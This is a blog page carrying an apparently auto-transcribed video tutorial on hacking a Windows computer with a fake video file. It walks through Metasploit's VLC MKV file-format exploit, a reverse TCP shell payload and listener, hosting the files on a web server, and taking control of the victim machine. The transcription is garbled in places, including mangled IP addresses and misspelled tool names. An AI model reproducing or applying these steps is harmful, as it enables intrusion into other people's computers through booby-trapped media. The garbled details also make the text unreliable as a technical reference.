in

Zero-day, Vulnerability, Computer security, Threat Watch How Hackers Break Into Your Computer With A Fake Video!

There are a lot of risks. There are a lot of dangers out there on the internet and when you open up those videos thats it its game over, your computer will be gone in seconds Music. So right in front of us, ive called linux running call. Linux is going to be a hackers operating system where well create those fake video files and send it over to the target machine. So once the user click onto the file open up, the video, the whole computer will get hacked so once again, hacking is illegal. So if you want to run any of these hacking techniques, do it only in your lab environment else if you get caught, please do not tell them that you know hackalor so now lets get started with the tutorial today, so in front of us. What we can do now is go ahead and launch terminal all right and go ahead and zoom in a little more so its easier for you to see so put this in the full screen or in the maximize screen for the terminal. So what ill do now is go ahead and enter sudo. Msf console so were using matasploy to run our attack to generate that fake video file so that when a user downloads it its game over. So here we have massboy framework started and running. So all you got to do now is enter certain vlc and vlc is a very common video player, and here you can see several exploits or modules thats available for us to generate this fake video file and then send it over to the user, and that will Give us shell into the system, meaning that we have full remote control of the computer, so once youre here.

What you can see now is that we have the following grade all right and this disclosure date is on two zero one eight. So this is exploit windows file format, vlc underscore mkv, zero 2018.05, two four, it has a ranking of grades, so this is a great x point for us to use to target against certain users. So what you can do now is go ahead and enter use, exploit windows, file, format, all right, follow the vlc underscore mkv hit enter on that enter, show options and it states the following right: use: configure payload windows x64, shall reverse tcp, so were targeting again windows. Machine in this case, we have a reverse tcp shell, so that we have that connection to the target machine. So now what we can do here, we can see the following. We have mkv1 mkv2 all right and now what we need to do is to specify the l host, which is the car linux ip address. So in this case we can use the following l host. So what it can do now is enter ipa ddr and we have the following. So in this case i have the ip address of 192 168.0.1.2. So this is the karl linux. Ip address that well be using so lets, go ahead and enter set options. All right with lhost 192 168.00 192 hit enter on that and the show options to verify all the options that we have placed into this particular module options.

So here you can see the following okay, so let me just ensure that i set it properly so set lhost all right, 192.168.0.1.2 and virtual options, and there you go all right. We have set the ip address into the payload option, so what we can do now is go ahead and enter exploit and this will begin the generation of the file. So here you can see the following. We have two files that are created all right. One is called bcbga part one and the other one is part two. So what we need to do is we can zip this file together, send it to the computer all right to the user, and once they open up the file thats it game over. Okay, so lets go ahead and do just that so right before we change and make this file available and accessible through, say a web server. What we can do now is to go ahead and launch and get ready so that when someone click and open up the file, we are ready to take control of the computer. So lets go ahead and use the phone use, exploit multi handler all right and once you hit enter on this all youre going to do now is go ahead and set the payload so set okay lets remember earlier: we have windows x64. Shell, slash reverse underscore tcp hit enter on that enter, show options and, in this case said, lhost182, 168.0192. Okay, so once youre ready enter exploit so now were listening, were waiting were waiting for someone to open up the file? Okay.

So, at the same time, what i can do now is go ahead and open up another terminal, all right. Let me maximize this and what we can do now is to shift that file thats been created into var www.html, where our web server can host those files. So that the user can click onto them, so what it can do now is go back to the earlier terminal and see where has those files been saved onto okay? So lets take a look at that which directory? Is it currently being saved at so here we can see the following all right, so we have done the generation of the file and we have them here and root. Ms f4, all right, bcb c. Ga part one lets go ahead and do a right click copy selection go to the other terminal and what ill do now? Is your sudo move all right? I want to shift this file paste. The selection and im going to shift it over to var www html. Slash hit enter on that enter your password for your user and now weve shifted the file. So likewise we need to do the same for part two. So go ahead and hit enter on that. So now both the files have been sent over into var www.html. All right so now everything is set. What we need to do is to start up our web server so that we can begin hosting those files. So what i can do now is enter sudo system systemctl all right.

What i can do next is to enter start apigee all right, followed by dots, apigee 2.service hit enter on that and that will begin running our apigee web server, and this makes those files available right now so now on a windows computer. All i got to do right now is go ahead and download the file, so i already downloaded them here, so you can see its following all right part, one and part two. So if i go ahead and double click onto the file here part one double click on it, you see were trying to play the file over here. Okay, so if i click play and whatever the file is, whichever the case is gon na embed it with an original file of our video file or movie file, whatever the case is now, if i go back over in call, linux youll see the following command shelf Session one open and then we have the ip address i hit, enter on that thats it its game over. We are in. If i enter, who am i in this case you can see the following all right. We have loi liang yang, so we managed to hack into loy leon youngs account inside the computer and with full control over whatever we want to do with the device with the computer. We can shut down the computer, we can open up firefox, we can do whatever we want in the machine because we are in were inside the machine right now.

So one of those things that we can do is to enter say, for example, notepad hit enter on that and now, if i go over into the windows computer, you see that notepad has been opened up. We can do anything we want with the device now that we have hacked into the computer. It doesnt matter its a video file, doesnt matter if its an exe msi, whatever the file, is be very careful. Every time you who the download are before you click onto any of these files else, it can lead to a complete compromise of your computer system. So once again, i hope you learned something available in todays tutorial like share, subscribe and turn on notifications, so that you can be kept abreast of the latest ethical hacking tutorial.

What do you think?

Written by freotech

Comments

Leave a Reply

Your email address will not be published. Required fields are marked *

Loading…

0

Zero-day, Vulnerability, Computer security, Threat kers use Windows zero-day to attack defense, IT firms

Zero-day, Vulnerability, Computer security, Threat Weaponized ‘MysterySnail’ Windows Attacks Confirmed | Straight Talking Cyber | Forbes